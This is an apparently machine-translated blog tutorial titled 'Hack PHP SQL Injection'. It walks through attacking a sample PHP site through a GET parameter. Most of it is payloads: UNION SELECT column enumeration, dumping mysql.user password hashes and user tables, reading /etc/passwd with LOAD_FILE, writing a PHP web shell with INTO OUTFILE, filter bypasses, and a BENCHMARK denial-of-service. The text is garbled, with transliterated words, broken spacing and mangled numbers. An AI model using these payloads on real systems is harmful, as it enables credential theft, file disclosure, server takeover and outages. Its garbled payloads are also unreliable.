Hack PHP SQL Injection
MySQL Injection - one of the most common critical holes dump-internet world .... It occurs quite frequently, with resource rather different classes. As with any vulnerability, mysql inj - creatures of encoder errors.
What gives us MySQL Injection?
This vulnerability allows the user to execute arbitrary commands in the database. And it pulls in a large number of yni consequences for the victim. Using MySQL Inj can destroy, under certain circumstances, any resource.
bit of the theory
So, look in more detail mysql inj.
For example, we have such a php code:
That is, nevdavayas into detail, in a request uses variable received script GET method.
And now, carefully looking at php code, we see that can change the query in their favor! If this variable does not filtered, instead of the normal ID, we can substitute such expression, which perform a particular query the database of victims. This is the MySQL inj.
workshop
How to find mysql inj Indeed, we do not have the source. But it is not problems. Consider an example:
Code:
http://www.site.ru/index.php?page=1
Method ? 1:
Frequently check on Mysql inj variable substitutions in a single quotes:
Code:
http://www.site.ru/index.php?page=1'
The result, svedetelstvuyuschem of vulnerability should be on the message that something like:
MySQL Error: mysql_query (.......) error expretion syntax ...
?????? something similar shows about 99% of the vulnerability of the resource.
Method ? 2
This, incidentally, the same way that many forget, and very often miss deep hole. After all, the script could stand, for example, filtering the character " '" osuschestvennaya, say, preg_replace ()
or may simply stand error_reporting (0), which see an error message is not destined to us. Therefore, in most cases just kiddisy kovychku uses, and does not turn an error, leaving the resource. So he, the second method:
Code:
http://www.site.ru/index.php?page=2-1
If such a request you show the same page, and that page = 1, then consider that 99% inektsiya here.
As now get some?
As I said, we need to paste in your query variable BUT
propisanny request because no one in the script repealed, so you need to make sure that he had issued the result NULL - that is blank.
Here is an example:
Code:
http://www.site.ru/index.php?page=-1 union + + + select null, null / *
or
Code:
http://www.site.ru/index.php?page=99999 union + + + select null, null / *
That is to execute a query or -1 record ? ? 99999 that will return empty value, and will continue our code (/ * - should be out the remainder of the query in a script. + Is a space). In order to proceed to the next stage, we have to pick a certain number of fields on a page that uses mysql. It is the method of crowding. For example:
union select null, null
union select null, null, null
union select null, null, null, null
etc. until we pick up their quantity. Signal, the fact that we have picked up the correct number of fields will be what we see on the page are the same as for the query page = 1, but all of page will be blank.
Suppose we have a 6 fields. Then the correct query would look like this:
Code:
http://www.site.ru/index.php?page=-1 union + + + select null, null, null, null, null, null / *
But there is a more convenient way to pick almost any number of columns in a matter of seconds. There is in such a thing as MySQL Order by .
Let me give you an example query:
Code:
? id =- 1 + + by order +100 / *
If the number of columns more than / equal to 100, the request is completely correct - if not, we can see the error. In this method can quickly find the columns.
Now we need to find those fields, which are displayed directly on the site. In lieu null put in a sequence of numbers - 1,2,3,4 ....
example:
Code:
http://www.site.ru/index.php?page=-1+ union + select +1,2,3,4,5,6 / *
Now we see on the site emerged figures in the fields. Now we know where to substitute the request. We can immediately get a bit of information. For example username base version mysqld, the name of the base.
For example:
Code:
http://www.site.ru/index.php?page=-1 + union + +1.2 select, USER (), 4,5,6 / *
Code:
http://www.site.ru/index.php?page=-1 + union + +1.2 select, VERSION (), 4,5,6 / *
Code:
http://www.site.ru/index.php?page=-1 + union + +1.2 select, DATABASE (), 4,5,6 / *
Now our chances have increased slightly. We can:
1) Get password root
To do this, draw up such a request:
Code:
Code:
http://www.site.ru/index.php?page=-1 + union + +1.2 select, user, password, 5,6 mysql.user + from + / *
We get only a hash of a password, which you can then decrypt using PasswordsPro.
Unfortunately, this method does not always work, but only when we have access to mysql.user
2) Read the other tables
The method is complicated by the fact that in order for us to read anything, we need to know THAT THIS. That is, the names of tables and fields just waiting match. For example, you can try to spreadsheet-type users, reg_users, admins, accaunts ...
Example:
Code:
http://www.site.ru/index.php?page=-1+ union + +1.2 select, name, passwd, 4,5,6 + + from users / *
3) Read files on the server
If we have the right file_priv we can read the files on the server
check with the user to visualize which mysqld. To do so, we will help LOAD_FILE () function. Example:
Code:
http://www.site.ru/index.php?page=-1 + union + +1.2 select, LOAD_FILE ( '/ etc / passwd'), 4,5,6 / *
4) Get a shell
Immediately I say that for this we need to know the location checked-out site. Drawing up a request to file recordable shell. Let mouth. dirrektoriya "/ home / site / public_html /"
Then, a query is:
Code:
http://www.site.ru/index.php?page=-1 + union + select +1,2,3,4,5, '' + + + from mysql.user into outfile + + '/ home / site / public_html / shell.php' / *
Here, indeed all of the major steps that can be done with MySQL Inj. All that I can add more, so that, for example, can be controlled number of outgoing HELPED table with the command limit.
Syntax: limit shift, QTY
Exapmle: union select 1.2, user, pass, from 5,6 + + + users limit +5.3 / * [/ i]
As a result which will return to 3 entry, beginning with the fifth
Secrets and the nuances
filtering Workaround:
For example, I sometimes met with the fact that variable with mysql inj filtered so that the expression, in the name field, I can not use the letters. This, I bypassed this way:
Code:
http://www.site.ru/index.php?page=-1 + union + +1.2 select, AES_DECRYPT (AES_ENCRYPT (USER (), 0x71), 0x71), 4,5,6 / *
It worked successfully.
Then remember the situation when faced kovychku filtering on, and I should have read the file using LOAD_FILE (). I toured it with char ()
Example read / etc / passwd:
Code:
http://www.site.ru/index.php?page=-1 + union + +1.2 select, LOAD_FILE (char (47101116,99,47112,97115115119100)), 4,5,6 / *
Just sometimes, most often in CMS that inektsiya, for example, in the name field, and there could not use spaces. Since then seem that all koncheno BUT, and this can be circumvented. Just spaces can be used instead of the commentary. For example:
Code:
http://www.site.ru/index.php?page=-1 + union + +1.2 select, user, password, 5,6 mysql.user + from + / *
same
Code:
http://www.site.ru/index.php?page=-1/ ** / union / ** / select / ** / 1.2, user, password, 5.6 / ** / from / * * / mysql.user / *
DOS
Code:
http://www.site.ru/index.php?page=-1 + BENCHMARK (10000000, BENCHMARK (10000000 md5 (current_date)))
ليست هناك تعليقات:
إرسال تعليق